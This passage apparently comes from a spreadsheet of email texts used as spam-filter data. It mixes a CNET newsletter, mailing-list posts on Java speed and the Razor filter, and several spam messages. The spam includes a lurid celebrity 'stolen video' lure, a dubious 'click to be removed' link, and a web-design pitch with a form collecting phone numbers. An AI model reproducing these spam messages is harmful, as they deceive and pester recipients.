 	3. &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzF0q58fIP26D_8gaZjMZR" &gt;Dell Dimension 4000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtit3ku77EMLKlXBDgnVnR" &gt;Atlas Micro CS 8000&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEntHtdfsN8lpW-B_KMqztrR" &gt;Falcon Northwest Mach V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DPPeGFQA5K-fxuEL5iR" &gt;See all most popular desktops&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;font face="Arial, Helvetica"&gt;                  
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_feat.gif" alt="Feature" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href=" http://home.cnet.com/software/0-3227888-8-20089773-1.html"&gt;Roundup: CNET reviews four free Web e-mailers&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Yahoo now charges for services that were once free; Hotmail
    dumps accounts without so much as an explanation. So-called
    free Web-based e-mailers aren't quite as free-wheelin' as
    before. Are the savings worth the hassle? We take another
    look at so-called "free" e-mailers.
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;!-- ad 2 --&gt;
 &lt;!-- /ad 2 --&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71ZArjzMtuoAABMMPZ9FR" &gt;Get the gear you need to burn DVDs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;DVD authoring is one of the hottest new hobbies around, but
    picking out the right equipment can be a daunting task.
    We've broken down the process and selected the best gear
    for the job, from camera to software, burner to DVD player.
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_rev.gif" alt="Review" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68wZ7dRCW5CH7esbKR9R" &gt;BearShare 4.0&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;The latest version of this oft-overlooked Gnutella client
    lets you pay $19.95 for ad-free file sharing and offers a
    nice, clean interface and a chat client to boot. Plus,
    BearShare lets you opt out of bundled adware and spyware
    when you install it. Should you run to this app like a bear
    to honey? Not yet. We'll tell you why.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIFL-NRQhaIHsSzky0uR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRUaKmyFgVnxXFZcIuIsR" &gt;&lt;b&gt;Manufacturer price&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDUmPkvyRmBekeVktk2ZR" &gt;Yahoo Mail&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt; &lt;br&gt;
 &lt;font size="-1"&gt;After months of beta testing and pricing adjustments (that's right, Yahoo now charges for some services), the new Yahoo Mail just hit the Web. Among its changes are a complete redesign, better Calendar and Address Book integration, and a new color palette. Find out if Yahoo still deserves your account.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkUeZaPxv3orMjEsaQuR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8ckKhl8S_XGuwrfzJ6nsR" &gt;Peachtree Complete Accounting 2003&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;For years, Peachtree has provided professional accounting to
    small businesses. As a result, Peachtree Complete 2003 has
    all the basics, including inventory control, time billing,
    and payroll management. And Peachtree even contains a wide
    array of Web tools for creating and maintaining an online
    store. What's new in 2003?
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroDrL4b9Iz4s1RhjGRsZR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRhKT2bbc-r7MBvWpjudR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeK2YLmwU5CfCkxHB0FrR" &gt;First Take: ICQ Lite Alpha&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;  
  One of our biggest beefs with ICQ has always been its
    bloated feature set. Now, the company has released a new
    "lite" ICQ that sucks up far less system memory than the
    full-fat version--but at what cost? We take a first look. 
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvkUTBuHrctPQDwwaMCiR" &gt;SBC Yahoo Dial&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; 
  Thanks to a partnership with SBC Pacific Bell, Yahoo is now
    in the dial-up game. The new service, known as SBC Yahoo
    Dial, offers a customized browser, 25MB of storage, and 11
    e-mail addresses--all for $21.95 or lower, depending on
    your SBC service package. Our reviewer investigates.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcO-dlO5H80ywQ-4d0P6lR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYP85T0DoaDkjVsTLZ89R" &gt;First Take: Winamp3 Release Candidate&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
    We've been waiting aeons for the newest version of popular
    media player Winamp. We haven't received a full new version
    yet, but AOL has partially obliged with a prerelease
    version. Winamp3 Release Candidate serves up a new interface
    and some major underlying changes. But does the new look
    muddy up Winamp's legendary ease of use?
 &lt;br&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_col.gif" alt="Review" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfPVFtPOr1yZeU_u_KnuR" &gt;Inside @ccess: Is your ISP safe from hackers?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; 
    Surely, the folks who run your ISP have thought long and hard
    about security issues, but should you count on their skills to
    ward off intruders? Not wise, says our ISP expert. In this
    week's column, Dan Tynan takes security matters into his own
    hands and shows you how to protect yourself.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_Cwu_meWLXZBXqONOVsR" &gt;Read the column&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_also.gif" alt="Also on CNET" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;b&gt;CNET Electronics: &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dwuRXSV41H99K8FZuS9R" &gt;Cell phone personality test--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
  Choose among our five user profiles to find out what models
    best match your wireless persona. Take the test and see them
    all.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1G9bXb2qHCu4jNix1DPuR" &gt;Read the full story&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_mail.gif" width="150" height="20" border="0" alt="Software Mailbag"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Import Hotmail addresses to Outlook?&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica"&gt;
 &lt;font size="-1"&gt;
   &gt;I'm running Windows 98. Everytime I try to download files&lt;br&gt;
    &gt;from the Internet, QuickTime tries to upgrade, stopping the&lt;br&gt;
    &gt;download cold. I tried to remove the software, but it won't&lt;br&gt;
    &gt;let me. Can you help? I would like to use Windows Media&lt;br&gt;
    &gt;Player instead. --Wicked
    &lt;p&gt;
  Based on your desription, we're guessing that QuickTime pops
    up when you try to stream a media file (video, audio, or MP3s)
    from the Web. If so, this probably means that you have
    QuickTime set as your default media player for all media
    files. And since your version of QuickTime is out-of-date,
    whenever it launches, it attmepts to upgrade. You could simply
    upgrade the program, or you can to turn off the autoupgrade
    feature. In QuickTime 5.0, open the program, select Edit &gt;
    Preferences &gt; QuickTime Preferences. Uncheck the box labeled
    "Check for updates automatically."
 	   &lt;p&gt;
    If, however, you simply prefer to use Windows Media Player,
    open that program, click Tools &gt; Options. Select the Formats
    tab, then check the boxes next to all of the file types that
    you want Windows Media Player to open. To make sure that
    QuickTime doesn't override your WMP settings, uncheck those
    file types within QuickTime.
 &lt;p&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4X0qTQHSAwQ4lAUw-5WsR" &gt;CNET reviews QuickTime 5.0&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4mnFo6wFZxrhBm0WHthZR" &gt;CNET reviews Windows Media Player 7.1&lt;/a&gt;&lt;/b&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;   
 &lt;p&gt;E-mail your stories and questions to: &lt;b&gt;&lt;A HREF="mailto:software-mailbag@cnet.com"&gt;software-mailbag@cnet.com&lt;/A&gt;&lt;/b&gt;.
 &lt;p&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://www.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://www.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zG3zqyFP8ZvQIzTKtR1dR" &gt;Live tech help: submit your questions now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAhjxZeOyNyGEI9rCM8vcR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmoaAxOG_7DQESNPe-iRR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6ZiEUc-PjHpx8lOheMnlR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH8ygIAYywvjsK-FdLP4R" &gt;May Editors' Choice award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
         &lt;!-- Begin search box --&gt;
         &lt;center&gt;
         &lt;table border="0" cellpadding="1" cellspacing="0" width="90%"&gt;&lt;tr&gt;&lt;td bgcolor="#CCCCCC"&gt;
         &lt;table border=0 cellspacing=0 cellpadding=0 width="100%"&gt;&lt;form method="GET" action="http://www.cnet.com/search/redirector/1,10207,0-0,00.html"&gt;
         &lt;tr align=center valign=middle bgcolor="#FFFFFF"&gt;
         &lt;td height=40 align=right nowrap&gt;&amp;nbsp;&lt;/td&gt;
         &lt;td class="f"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Search&lt;/b&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
         &lt;td align=left&gt;&lt;input type="Text" class="f" name="qt" size="18" maxlength="255"&gt;&lt;/td&gt;
         &lt;td&gt;&amp;nbsp;&lt;select name="tg"&gt;&lt;option value="sw-8888" selected&gt;In Software&lt;option value="nw"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;option value="wb"&gt;The Web&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
         &lt;td&gt;&amp;nbsp;&lt;input name='search' type='submit' class='f' value=' Go! '&gt;&amp;nbsp;
         &lt;input type="hidden" name="tt" value="st.sw.8888.sbsr"&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/form&gt;
         &lt;/table&gt; 
         &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
         &lt;/center&gt;  
         &lt;!-- End search box --&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
         &lt;/td&gt;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HREF='http://clickthru.online.com/Click?q=7e-XDMezipN37q7T_6b6pC7stkhZeXffdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ305A0HocTYjvQ8Rgn5FR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxneucjeqz2JQZv91zVMcR"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href="http://clickthru.online.com/Click?q=be-B7ixQCpTprSHNQzbnY9y52GfwHRR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYHzcHVGK74p01K7fy3FR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8U_DIeaRrAP_kMFIM559R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1ldZyl6O_Iti64Q9t8uR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYle6cG4-pEvKY-qkCKsR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2GRyZMc9SkMRUVolYrBZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e447&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=3d-oi4NnDz96XXp4Jn3sebLZXPTXsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;
 &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
 &gt; difference between Java and C/C++ are relevant any more.
 When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
 C++ on the same hardware then it does matter.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: See the VIDEO Britney Wants BANNED!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_NextPart_000_6395_000076C1.00005D45
 Content-Type: text/html;
 &lt;HTML&gt;
 &lt;BODY bgColor=#FF80C0&gt;
 &lt;FONT face="MS Sans Serif"&gt;
 &lt;FONT size=3&gt; See the VIDEO Britney Wants BANNED!&lt;BR&gt;
 STOLEN HOME VIDEO OF BRITNEY SPEARS&lt;BR&gt;
 &amp; WE HAVE THE VIDEOTAPE!!!!&lt;BR&gt;
 &lt;FONT size=2&gt; &lt;a href="http://members.tripod.co.uk/hannah782"&gt;CLICK HERE!&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 Britney Caught With Her Mouth Full!&lt;BR&gt;
 http://members.tripod.co.uk/hannah782&lt;BR&gt;
 &lt;BR&gt;
 ________________________________&lt;BR&gt;
 Screening of addresses &lt;BR&gt;
 has been done to the best &lt;BR&gt;
 of our technical ability.&lt;BR&gt;
 We respect all removal requests.&lt;BR&gt;
 &lt;BR&gt;
 If You Don't Want To Receive This Email Again&lt;BR&gt;
 Then Simply Click The Following Link To Be Removed!&lt;BR&gt;
 (You Must Click It To Be Removed) &lt;a href="http://www.removeyou.com"&gt;REMOVE ME!&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;FONT face="MS Sans Serif"&gt;&lt;p&gt;&lt;FONT size=3&gt; See the VIDEO Britney Wants BANNED!&lt;BR&gt;&lt;p&gt;STOLEN HOME VIDEO OF BRITNEY SPEARS&lt;BR&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ~Beautiful,Custom Websites $359 Complete! (or yours re-designed) (6320cUmF1-704zRjD7955@20)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Beautiful,Custom Websites for $359 Complete!&lt;/TITLE&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/head&gt;
 &lt;BODY text=#000000 vLink=#000080 aLink=#000080 link=#000080 bgColor=#000080 
 topMargin=7&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=#000000 height=368 cellSpacing=0 cellPadding=3 width=575 
 bgColor=#79a5ff border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=565 bgColor=#000000 height=22&gt;
       &lt;P align=center&gt;&lt;FONT face=Arial color=#ffffff&gt;&lt;B&gt;Beautiful, 100% Custom 
       Websites, $359 Complete!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top width=565 height=318&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE style="WIDTH: 555px" height=341 cellSpacing=0 cellPadding=0 
       width="60%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" height=366&gt;
             &lt;DIV align=center&gt;
             &lt;TABLE borderColor=#000000 height=5 cellSpacing=0 cellPadding=5 
             width=554 bgColor=#ffffff border=1&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width=540 height=1&gt;&lt;FONT color=#ff0000&gt;
                   &lt;TABLE height=61 width="100%" border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD width="30%" height=55&gt;
                         &lt;P align=center&gt;&lt;IMG height=100 
                         src="http://7x24.sunshinehui.com/mnbv/csi.gif" width=133 
                         border=0&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/FONT&gt;
                       &lt;TD vAlign=top width="70%" height=55&gt;
                         &lt;P align=center&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;&lt;FONT 
                         size=4&gt;Get a beautiful, 100% Custom Web Site (&lt;EM&gt;or 
                         yours redesigned&lt;/EM&gt;)&amp;nbsp;&lt;I&gt;for only 
                         $359&lt;/I&gt;!*&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
                         color=#ff0000&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial 
                         color=#ff0000 size=3&gt;We have references coast to 
                         coast&amp;nbsp;&lt;BR&gt;and will give you &lt;I&gt;plenty of sites to 
                         view!&lt;/I&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial size=3&gt;&lt;STRONG&gt;Includes up to 
                   7 pages (you can add more), java rollover buttons, feedback 
                   forms, more. It will be constructed to your taste and 
                   specifications. We do not use templates,&amp;nbsp; &lt;EM&gt;our sites 
                   are completely custom.&amp;nbsp;&lt;/EM&gt;&lt;FONT 
                   color=#ff0000&gt;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;*&lt;I&gt;Must host with us @ 
                   $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                   Page, Graphical Statistics, 
                   more).&lt;BR&gt;&lt;/I&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 
                   size=4&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=Arial size=3&gt; 
                   &lt;/FONT&gt;&lt;I&gt;&lt;FONT face=Arial color=#ff0000 size=3&gt;For sites to 
                   view, complete below or call our message center at 
                   321-726-2209 (24 hours). Your call will be returned 
                   promptly.&lt;/FONT&gt;&lt;/I&gt;&lt;FONT face=Arial color=#000080 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#ff0000 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial size=2&gt;&lt;B&gt;&lt;FONT 
                   color=#0000ff&gt;&lt;I&gt;NOTE:&amp;nbsp;&amp;nbsp; If you are using a web 
                   based email program (such as Yahoo, Hotmail, etc.) the form 
                   below will not work.&lt;/I&gt;&amp;nbsp;&lt;/FONT&gt; Instead of using the 
                   form,&lt;FONT color=#000080&gt;&amp;nbsp;&lt;/FONT&gt;&lt;A 
                   href="mailto:88mnbv@excite.com?subject=More info, I HAVE INCLUDED MY NAME, PHONE and STATE!(18na0806359)"&gt;&lt;FONT 
                   color=#000080&gt; &lt;/FONT&gt;&lt;I&gt;&lt;FONT color=#0000ff&gt;CLICK 
                   HERE&lt;/FONT&gt;&lt;/I&gt;&lt;/A&gt;&lt;FONT color=#ff0000&gt; &lt;/FONT&gt;&lt;FONT 
                   color=#0000ff&gt;.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;FORM 
                   action="mailto:88mnbv@excite.com?subject=WS Sales Inquiry18na0806359" 
                   method=post encType=text/plain &lt;FORM&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial color=#000080 
                   size=1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;FONT face=Arial 
                   color=#000000 size=1&gt;Name:&lt;INPUT size=26 name=Name&gt; Phone 
                   w/AC*:&lt;INPUT size=16 name=Phone&gt;State:&lt;INPUT size=6 
                   name=State&gt; &lt;BR&gt;Type Project:&lt;I&gt;&lt;INPUT type=radio value=New 
                   name=Project&gt;&lt;/I&gt; &lt;I&gt;New Site:&lt;INPUT type=radio value=Redesign 
                   name=Project&gt;Redesign &lt;INPUT type=radio value=Flash 
                   name=Project&gt;Flash Intro/banner&lt;/I&gt;&amp;nbsp;&amp;nbsp; Current 
                   site?:&lt;INPUT name=Currentsite&gt;&lt;BR&gt;Comments:&lt;/FONT&gt;&lt;FONT 
                   face=Arial color=#000080 size=1&gt;&lt;INPUT size=66 
                   name=Comments&gt;&amp;nbsp;&amp;nbsp;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT size=2&gt;&lt;INPUT type=submit value=Submit name=B1&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FORM&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
             &lt;CENTER&gt;
             &lt;DIV align=left&gt;&lt;FONT face=Arial size=2&gt;&lt;BR&gt;If you do not wish to 
             receive our messages,&lt;/FONT&gt;&lt;FONT face=Arial&gt; &lt;FONT size=3&gt;&lt;B&gt;&lt;I&gt;&lt;A 
             href="mailto:poi987t@excite.com?subject=No_more_mail_18na_0806359e1"&gt;CLICK 
             HERE&lt;/A&gt; &amp;nbsp; &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial size=2&gt;(Please enter 
             ALL email addresses (in the body of the message) you wish to have 
             eliminated from future 
         mailings.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 [8734IcUm5-941FzRj1099DvNh4-450ZrLD0601Vnia4-052sMEW9113qIaU3-562mEwQ9923iBvN2-17@75]
</t>
  </si>
  <si>
    <t xml:space="preserve">  The way Razor breaks down mail is simple.  If a mail contains MIME
   boundaries it is split on those boundaries, each MIME part is considered 
   when marking the mail as spam.
   In 2.14, there are different 'logic methods' for detecting spam.
   The default method 5 requires all non-contention parts to be spam for
   the mail to be marked as spam.  A part is considered under
   contention if its not clear if its spam are not, and is relatively
   rare.
   Sounds like you are not using 2.14, or maybe you're misinterpreting
   the log files.  Feel free to send me the log files if you think 
   there is a bug.
   Also, as jordan says, if you get a legit mail marked as spam (based
   on whatever MIME stuff is going on), you should revoke it (which sends
   all parts in) so TeS can take care of business.  
   cheers,
   chad
 On 19/08/02 07:41 -0700, Jordan Ritter wrote:
 ) If I understand you correctly, you should revoke the message en total,
 ) because this is one of various inputs that TeS uses to understand what
 ) parts are under contention.  
 ) 
 ) As for your question specifically, Chad can answer that (sorry, I
 ) don't know).
 ) 
 ) --jordan
 ) 
 ) On Mon, Aug 19, 2002 at 09:14:17AM -0500, Steve Price wrote:
 ) 
 ) # Is there an easy way in Razor v2 to turn off detecting a message as
 ) # SPAM if one of the MIME parts was found in a previous SPAM?  I just
 ) # received subscribe request to a moderated ecartis list and it was
